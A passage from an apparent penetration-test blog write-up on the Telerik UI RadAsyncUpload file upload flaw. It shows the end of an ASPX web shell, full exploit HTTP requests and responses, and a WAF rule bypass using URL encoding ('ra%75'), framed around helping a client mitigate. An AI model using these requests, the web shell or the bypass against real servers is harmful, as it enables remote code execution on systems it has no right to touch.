0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myString As String = myStreamReader.Readtoend()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.Close()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>mystring=replace(mystring,"<","&lt;")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>mystring=replace(mystring,">","&gt;")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Response.Write(vbcrlf & "<pre>" & mystring & "</pre>")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>%></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span></div></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span></form></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></body></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></html></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_109742195623.aspx"}</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span></pre><p cid="n41" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n42" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It is possible to notice that the application performs a request to the <i>"/Telerik.Web.UI.WebResource.axd?type=rau"</i> endpoint attaching the malicious file and the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter containing all the encrypted metadata required for Telerik to handle the uploaded file.</span></p><p cid="n43" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Since the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter was encrypted with the hardcoded key of the 2014.2.724 Telerik version it accepts the unauthenticated upload as shown in the response to the previous request.</span></p><p cid="n44" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n45" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Wed, 01 Apr 2020 10:48:50 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":884,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" }</span></pre><p cid="n46" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n47" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Since the malicious ".aspx" was uploaded to a known folder in the web root of the application, it was then sufficient to recall the file with a URL of the application to execute the code. The following screenshot shows how the code prints the content of the "<i>C:\Windows\SysWOW64\inetsrv</i>" directory belonging to the IIS Web Server that is hosting the vulnerable application.</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8Q9p92TETp4/X6b3p76xc5I/AAAAAAAAAAU/FpIAUo_wJsQJ97r5RoAmKn7EH3a3PXiWQCLcBGAsYHQ/s678/better.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="678" height="270" src="https://1.bp.blogspot.com/-8Q9p92TETp4/X6b3p76xc5I/AAAAAAAAAAU/FpIAUo_wJsQJ97r5RoAmKn7EH3a3PXiWQCLcBGAsYHQ/w493-h270/better.png" width="493" /></a></div><div><h4 cid="n51" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><br class="Apple-interchange-newline" />Fixing the Issue at WAF level</span></h4><p cid="n52" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Once the criticality of the vulnerability was confirmed, the client was immediately contacted in order to speed up the fixing of the file upload.</span></p><p cid="n53" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The <b>ideal fix</b> for the vulnerability would be that of <b>updating the version</b> of <i>Telerik UI</i> used by the application to its latest version that is no longer vulnerable. </span></p><p cid="n53" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However,<b> the client informed us</b>, shortly after the disclosure, that it had <b>no immediate control over the vulnerable asset since it was a third party product that could not be updated right away.</b></span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The application could not be <i>simply dismantled</i> because it was still <u>actively</u> used within the organization. </span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"So, what now?"</i></span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;">The only viable option for the client was that of <b>creating a WAF rule</b> that would block any request exploiting the vulnerable file upload functionality offered by Telerik.</p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><br /></span></p><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The following paragraphs will recap the various attempts that were performed </span>address the vulnerability, in collaboration with client WAF engineers, without impacting on the usability of the asset.</p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- <u>1st WAF Rule - Overkill</u></b></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-size: 16px;">The first rule attempt consisted in <i>blocking all incoming requests </i>towards "<i>/Telerik.Web.UI.WebResource.axd</i>" endpoint belonging to Telerik UI. </span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-size: 16px;">Unfortunately, the rule was<b> too strict.</b> It not only blocked every malicious calls, but also any form of interaction of the application with Telerik UI making the user interface <i>unusable</i>.</span><span style="font-size: 16px;">
</span></p><p cid="n60" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>2nd WAF Rule: Hunting for "<i>rau</i>"</u></b></span></p><p cid="n62" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Final goal: blocking all the requests to Telerik UI using <i>RadAsyncUpload</i> functionality.</span></p><p cid="n62" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The rule was relaxed by adding a condition. The request must contain the "<i>type=rau</i>" parameter value within the query string since it was the command </span>for file upload.</p><p cid="n63" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This rule was enough to block basic requests, as the one reported above, created by automatic tools that exploit the vulnerability such as </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/bao7uo/RAU_crypto" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">RAU_crypto</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> .</span></p><p cid="n64" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However, it was noticed that the Web Application Firewall <b>would not normalize</b> the value of the received parameters.</span></p><p cid="n64" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A valid bypass would be to URL encode a character within the "<i>type</i>" parameter value "<i>rau</i>" to bypass the rule, specifically:</span></p><p cid="n65" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">"<i>rau</i>" -> "<i>ra%75</i>" where "<i>%75</i>" is the "<i>u</i>" character URL encoded.</span></p><p cid="n66" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The following request shows how it was possible to still load an arbitrary file on the system.</span></p><p cid="n67" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n68" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;"><span style="background-color: #f8f8f8;">/Telerik.Web.UI.WebResource.axd?type=ra</span><span style="background-color: #fcff01;">%75</span></span> <span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2347</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViNFY[Encrypted rauPostData Payload in base64]mUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n69" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n70" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #fcff01; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Thu, 07 May 2020 16:11:22 GMT</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":135,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" 